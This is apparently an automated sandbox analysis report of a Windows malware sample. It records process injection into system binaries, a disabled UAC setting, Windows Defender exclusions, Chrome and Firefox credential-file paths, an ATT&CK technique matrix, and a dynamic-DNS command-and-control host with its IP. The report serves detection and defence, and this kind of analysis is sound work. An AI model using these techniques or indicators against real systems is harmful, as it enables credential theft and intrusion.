              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00404F31 GetLocalTime,CreateEventA,CreateThread,13_2_00404F31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004195F8 GetComputerNameExW,GetUserNameW,13_2_004195F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,13_2_004466BF
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
              Source: Amcache.hve.16.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.16.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.16.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.16.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
              Source: Amcache.hve.16.drBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 29.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f101900.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c227360bd8.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a4568b350.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a45700998.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f08c2b8.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa701bf0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c2272eb590.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a45700998.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa68c5a8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f101900.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f08c2b8.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa701bf0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a4568b350.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c227360bd8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa68c5a8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c2272eb590.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000013.00000002.1399874525.00000000050A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3811250705.0000000005577000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1528643546.0000013F4F016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.1493095561.0000000002E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000002.1577698674.0000000004E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1595202046.00000138AA616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.1546946748.0000020A45615000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.1623163422.000001C227275000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7964, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8048, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: csc.exe PID: 8164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: ngen.exe PID: 7544, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wmplayer.exe PID: 2052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7920, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7172, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data13_2_0040A953
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data19_2_0040A953
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data29_2_0040A953
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\13_2_0040AA71
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: \key3.db13_2_0040AA71
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\19_2_0040AA71
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: \key3.db19_2_0040AA71
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\29_2_0040AA71
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: \key3.db29_2_0040AA71

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 29.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f101900.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c227360bd8.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a4568b350.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a45700998.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f08c2b8.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa701bf0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c2272eb590.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a45700998.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa68c5a8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f101900.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f08c2b8.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa701bf0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a4568b350.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c227360bd8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa68c5a8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c2272eb590.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000013.00000002.1399874525.00000000050A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3811250705.0000000005577000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1528643546.0000013F4F016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.1493095561.0000000002E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000002.1577698674.0000000004E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1595202046.00000138AA616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.1546946748.0000020A45615000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.1623163422.000001C227275000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7964, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8048, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: csc.exe PID: 8164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: ngen.exe PID: 7544, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wmplayer.exe PID: 2052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7920, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7172, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: cmd.exe13_2_0040567A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: cmd.exe19_2_0040567A
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: cmd.exe29_2_0040567A
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid Accounts1
              Native API
              1
              Scripting
              1
              DLL Side-Loading
              21
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services12
              Archive Collected Data
              11
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              11
              Deobfuscate/Decode Files or Information
              111
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol111
              Input Capture
              2
              Encrypted Channel
              Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job
              1
              Windows Service
              1
              Windows Service
              2
              Obfuscated Files or Information
              2
              Credentials In Files
              1
              System Service Discovery
              SMB/Windows Admin Shares3
              Clipboard Data
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              Service Execution
              1
              Scheduled Task/Job
              221
              Process Injection
              1
              Timestomp
              NTDS3
              File and Directory Discovery
              Distributed Component Object ModelInput Capture1
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchd1
              Registry Run Keys / Startup Folder
              1
              Scheduled Task/Job
              1
              DLL Side-Loading
              LSA Secrets43
              System Information Discovery
              SSHKeylogging21
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Registry Run Keys / Startup Folder
              111
              Masquerading
              Cached Domain Credentials151
              Security Software Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Modify Registry
              DCSync61
              Virtualization/Sandbox Evasion
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job61
              Virtualization/Sandbox Evasion
              Proc Filesystem2
              Process Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation
              /etc/passwd and /etc/shadow1
              Application Window Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron221
              Process Injection
              Network Sniffing1
              System Owner/User Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1482506 Sample: LisectAVT_2403002A_136.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 73 windowsserverfebarch.duckdns.org 2->73 79 Found malware configuration 2->79 81 Malicious sample detected (through community Yara rule) 2->81 83 Antivirus / Scanner detection for submitted sample 2->83 87 17 other signatures 2->87 10 LisectAVT_2403002A_136.exe 1 7 2->10         started        14 svchost.exe 1 3 2->14         started        16 svchost.exe 2->16         started        18 5 other processes 2->18 signatures3 85 Uses dynamic DNS services 73->85 process4 dnsIp5 69 C:\Users\user\AppData\Roaming\svchost.exe, PE32+ 10->69 dropped 71 C:\Users\...\LisectAVT_2403002A_136.exe.log, CSV 10->71 dropped 117 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->117 119 Drops PE files with benign system names 10->119 21 cmd.exe 1 10->21         started        23 cmd.exe 1 10->23         started        121 Uses regedit.exe to modify the Windows registry 14->121 123 Writes to foreign memory regions 14->123 125 Adds a directory exclusion to Windows Defender 14->125 127 Disables UAC (registry) 14->127 26 csc.exe 14->26         started        29 powershell.exe 23 14->29         started        35 2 other processes 14->35 129 Injects a PE file into a foreign processes 16->129 31 powershell.exe 16->31         started        37 5 other processes 16->37 75 127.0.0.1 unknown unknown 18->75 33 powershell.exe 18->33         started        39 9 other processes 18->39 file6 signatures7 process8 dnsIp9 41 svchost.exe 3 21->41         started        44 conhost.exe 21->44         started        46 timeout.exe 1 21->46         started        89 Uses schtasks.exe or at.exe to add and modify task schedules 23->89 48 conhost.exe 23->48         started        50 schtasks.exe 1 23->50         started        77 windowsserverfebarch.duckdns.org 45.128.223.185, 49711, 49727, 49728 UKSERVERS-ASUKDedicatedServersHostingandCo-Location Estonia 26->77 91 Contains functionalty to change the wallpaper 26->91 93 Contains functionality to steal Chrome passwords or cookies 26->93 95 Contains functionality to register a low level keyboard hook 26->95 99 2 other signatures 26->99 97 Loading BitLocker PowerShell Module 29->97 52 conhost.exe 29->52         started        54 conhost.exe 31->54         started        56 conhost.exe 33->56         started        signatures10 process11 signatures12 101 Writes to foreign memory regions 41->101 103 Adds a directory exclusion to Windows Defender 41->103 105 Injects a PE file into a foreign processes 41->105 58 ngen.exe 41->58         started        61 powershell.exe 41->61         started        63 WerFault.exe 41->63         started        65 WerFault.exe 41->65         started        process13 signatures14 107 Contains functionalty to change the wallpaper 58->107 109 Contains functionality to steal Chrome passwords or cookies 58->109 111 Contains functionality to steal Firefox passwords or cookies 58->111 113 Delayed program exit found 58->113 115 Loading BitLocker PowerShell Module 61->115 67 conhost.exe 61->67         started        process15

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              LisectAVT_2403002A_136.exe100%AviraTR/Kryptik.yewjj
              LisectAVT_2403002A_136.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%URL Reputationsafe
              http://geoplugin.net/json.gp/C0%URL Reputationsafe
              http://www.w3.o0%URL Reputationsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsyVb/vlWA0%Avira URL Cloudsafe
              https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf0%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdhema0%Avira URL Cloudsafe
              https://login.microsoftonline.com/ppsecure/DeviceQuery.srf0%Avira URL Cloudsafe
              http://schemas.mi0%Avira URL Cloudsafe
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
              https://login.microsoftonline.com/ppsecure/ResolveUser.srf0%Avira URL Cloudsafe
              http://upx.sf.net0%URL Reputationsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdference0%Avira URL Cloudsafe
              http://schemas.xmlsoap.org/ws/2005/02/trust/Issue0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              https://login.microsoftonline.com/MSARST2.srf0%Avira URL Cloudsafe
              http://schemas.xmlsoap.org/ws/2005/02/sc0%URL Reputationsafe
              http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID0%Avira URL Cloudsafe
              https://login.live.m/0%Avira URL Cloudsafe
              http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%URL Reputationsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd0%URL Reputationsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd.0.xs0%Avira URL Cloudsafe
              http://schemas.xmlsoap.org/ws/2005/02/sccI=c0%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA0%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdorg0%Avira URL Cloudsafe
              https://account.live.com/inlinesignup.aspx?iww=1&id=80603ssuer0%Avira URL Cloudsafe
              https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuer0%Avira URL Cloudsafe
              https://login.microsoftonline.com/ppsecure/devicechangecredential.srf0%Avira URL Cloudsafe
              https://login.microsoftonline.com/ppsecure/devicechangecredential.srfres0%Avira URL Cloudsafe
              http://Passport.NET/tb0%Avira URL Cloudsafe
              https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf0%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecuri0%Avira URL Cloudsafe
              http://Passport.NET/STS</ds:KeyName>&lt:KeyInfo0%Avira URL Cloudsafe
              Xerverfebarch.duckdns.org0%Avira URL Cloudsafe
              http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd0%Avira URL Cloudsafe
              https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM0%Avira URL Cloudsafe
              https://account.live.com/InlineSignup.aspx?iww=1&id=805020%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-2000%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdJjT99GvGMU0%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdVyq0%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-20%Avira URL Cloudsafe
              https://signup.live.com/signup.aspx0%Avira URL Cloudsafe
              https://account.live.com/inlinesignup.aspx?iww=1&id=806010%Avira URL Cloudsafe
              http://Passport.NET/tb_0%Avira URL Cloudsafe
              https://account.live.com/inlinesignup.aspx?iww=1&id=806000%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd~0%Avira URL Cloudsafe
              https://account.live.com/inlinesignup.aspx?iww=1&id=806030%Avira URL Cloudsafe
